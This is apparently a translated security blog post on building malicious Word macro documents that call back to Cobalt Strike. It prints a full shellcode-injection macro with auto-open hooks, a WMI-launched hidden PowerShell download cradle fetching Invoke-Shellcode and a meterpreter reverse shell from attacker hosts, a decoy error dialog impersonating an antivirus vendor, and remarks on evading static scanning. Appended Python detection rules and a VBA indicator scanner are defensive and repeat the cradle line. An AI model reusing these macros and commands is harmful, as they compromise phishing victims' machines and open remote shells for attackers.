Phishing Document Musings (1)


This article briefly introduces phishing with macro code and making the macro call back to Cobalt Strike. Cobalt Strike ships with a built-in macro phishing feature, which can be generated with the following steps:


Attacks --> Packages --> MS Office Macro




The generated content looks roughly like this:


' Macro as generated by Cobalt Strike; the shellcode byte array is elided here as "shellcode".
Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

' The imports get innocuous names, but the Alias clause still spells the real kernel32 export.
#If VBA7 Then
    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If

Sub Auto_Open()
    Dim myByte As Long, myArray As Variant, offset As Long
    Dim pInfo As PROCESS_INFORMATION
    Dim sInfo As STARTUPINFO
    Dim sNull As String
    Dim sProc As String

#If VBA7 Then
    Dim rwxpage As LongPtr, res As LongPtr
#Else
    Dim rwxpage As Long, res As Long
#End If
    myArray = Array(shellcode)
    ' On 64-bit Windows the 32-bit rundll32.exe under SysWOW64 is chosen as the host process.
    If Len(Environ("ProgramW6432")) > 0 Then
        sProc = Environ("windir") & "\SysWOW64\rundll32.exe"
    Else
        sProc = Environ("windir") & "\System32\rundll32.exe"
    End If

    ' CreateProcessA with dwCreationFlags = 4 (CREATE_SUSPENDED) and no command-line arguments.
    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)

    ' VirtualAllocEx with MEM_COMMIT (&H1000) and PAGE_EXECUTE_READWRITE (&H40), a byte-wise
    ' WriteProcessMemory loop, then CreateRemoteThread on the new page.
    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
    For offset = LBound(myArray) To UBound(myArray)
        myByte = myArray(offset)
        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
    Next offset
    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub


Now let's use a different method to build a simple phishing document. First create a new Word document, then open the macro editing page.



Enter any name for the macro to get to the VB editor.




This example uses a PowerShell callback for the macro attack. We can base our macro on already-public code (https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/blob/master/MacroCode), which uses WMI to start the process.

Trimming it down gives the following macro code; all that was actually removed is the scheduled-task (persistence) part.



Sub Auto_Open()
    ' The original called ExecutePersist; with the persistence part removed, the entry point is Execute.
    Execute
End Sub

Public Function Execute() As Variant
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    ' Win32_ProcessStartup with ShowWindow = 0 hides the spawned console window.
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    ' Win32_Process.Create launches via the WMI provider host, so the child's parent is WmiPrvSE.exe, not the Office process.
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force", Null, objConfig, intProcessID
End Function


His macro by default has PowerShell call Invoke-Shellcode, i.e. the following:


powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force


With CS we can skip all that and use a direct PowerShell callback, as follows:


powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.2.114:8011/a'))"


Substitute it at the corresponding spot, paste the macro into the editor, run it, and get a session.
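Both macros above leave traces in process-creation telemetry: the Cobalt Strike macro starts a bare rundll32.exe from the Office process, and the WMI launcher starts PowerShell with WmiPrvSE.exe as its parent instead of the Office application. The following is added example code written for this page, not from the original post or from Cobalt Strike; the event dictionaries are constructed and the Sysmon-like field names are an assumption.

```python
"""Triage constructed process-creation events for the two macro behaviours on this page.
Example code for this page; the event shape (image, parent_image, command_line) is assumed."""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
CRADLE_MARKERS = ("downloadstring", "iex ", "invoke-expression")
HIDING_FLAGS = ("-w hidden", "-windowstyle hidden", "-nop", "-noprofile", "-executionpolicy bypass")

def _base(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def office_spawns_bare_rundll32(ev: dict) -> bool:
    """CS macro pattern: Office launches rundll32.exe with no arguments as a host to inject into."""
    if _base(ev["parent_image"]) not in OFFICE_APPS or _base(ev["image"]) != "rundll32.exe":
        return False
    # Legitimate rundll32 use names a DLL and export; a command line ending at the exe is the tell.
    return ev["command_line"].strip().strip('"').lower().endswith("rundll32.exe")

def wmi_spawned_powershell_cradle(ev: dict) -> bool:
    """WMI macro pattern: Win32_Process.Create makes WmiPrvSE.exe the parent, so a plain
    Office-to-PowerShell rule misses it; key on that parent plus download-cradle strings."""
    if _base(ev["parent_image"]) != "wmiprvse.exe" or _base(ev["image"]) != "powershell.exe":
        return False
    cmd = ev["command_line"].lower()
    return any(m in cmd for m in CRADLE_MARKERS) and any(f in cmd for f in HIDING_FLAGS)

RULES = {"office_bare_rundll32": office_spawns_bare_rundll32,
         "wmi_powershell_cradle": wmi_spawned_powershell_cradle}

def triage(events: list) -> dict:
    """Return {event_index: [rule names]} for events matching at least one rule."""
    hits = {}
    for i, ev in enumerate(events):
        names = [name for name, rule in RULES.items() if rule(ev)]
        if names:
            hits[i] = names
    return hits

# Constructed events: the two behaviours from this page plus two benign look-alikes.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\SysWOW64\rundll32.exe", "command_line": r'"C:\Windows\SysWOW64\rundll32.exe"'},
    {"parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.2.114:8011/a'))\""},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
    {"parent_image": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]
```

Only the first two constructed events match; the benign PowerShell run with -NoProfile and the DLL-bearing rundll32 launch are left alone.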




To make it more convincing, you can add a pop-up dialog, for example like this one:




The code is as follows:


Result = MsgBox("The document cannot be decrypted.", vbAbortRetryIgnore + vbCritical, "Please contact 360.")



Let's look at the detection rate:





Since the macro contains no shellcode at all, it fares very well against static scanning.
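As a counterpoint to that static-scan result, the following added example (written for this page, not from the original post) scans VBA source for string indicators that survive even when no shellcode is embedded: auto-exec entry points, the kernel32 Alias names, the WMI process-creation moniker, the PowerShell download cradle, and the decoy dialog. The indicator lists and the sample macro text are constructed assumptions, not any vendor's signatures.

```python
"""Static indicator scan of VBA macro source, a counterpoint to the page's observation that a
macro without embedded shellcode scores well against static scanners. Example code written for
this page; the indicator lists are an assumption, not any vendor's signatures."""
import re

# Each category is a list of case-insensitive regexes run over the raw macro text.
INDICATORS = {
    "autoexec": [r"\bAuto_?Open\b", r"\bWorkbook_Open\b", r"\bDocument_Open\b"],
    # The CS template renames its imports (CreateStuff, AllocStuff, ...), but the Alias
    # clause must still spell the real kernel32 export, so it remains a string indicator.
    "injection_api": [r'Alias\s+"(CreateRemoteThread|VirtualAllocEx|WriteProcessMemory|CreateProcessA)"'],
    "wmi_process_create": [r"winmgmts:", r"\bWin32_Process\b", r"\.Create\s+\""],
    "powershell_cradle": [r"powershell(\.exe)?\b", r"DownloadString", r"\bIEX\b", r"-w(indowstyle)?\s+hidden"],
    "decoy_dialog": [r"\bMsgBox\s*\(", r"\bvbCritical\b"],
}


def scan_vba(source: str) -> dict:
    """Return {category: [matched text, ...]} for every category with at least one hit."""
    hits = {}
    for category, patterns in INDICATORS.items():
        found = [m.group(0) for pat in patterns for m in re.finditer(pat, source, re.IGNORECASE)]
        if found:
            hits[category] = found
    return hits


def verdict(source: str) -> str:
    """Coarse triage: an auto-exec entry point plus any execution category is the shape of this page's macros."""
    hits = scan_vba(source)
    if "autoexec" in hits and hits.keys() & {"injection_api", "wmi_process_create", "powershell_cradle"}:
        return "suspicious"
    return "review" if hits else "clean"


# Constructed macro text modelled on this page's WMI launcher and decoy dialog (not the real document).
SAMPLE_MACRO = r'''
Sub Auto_Open()
    Result = MsgBox("The document cannot be decrypted.", vbAbortRetryIgnore + vbCritical, "Please contact 360.")
    Execute
End Sub
Public Function Execute() As Variant
    Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
    objProcess.Create "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://192.168.2.114:8011/a'))""", Null, objConfig, intProcessID
End Function
'''
```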


Closing notes


In real engagements this kind of PowerShell-based approach is certainly not the best choice; it is offered here only as one idea. For instance, a certain "60" suite already locks PowerShell down very tightly, so it cannot be used for a normal callback. Upcoming articles will modify the approach to make it more generally applicable.


Reference: https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery




This article was first published on the WeChat official account LemonSec: Phishing Document Musings (1)
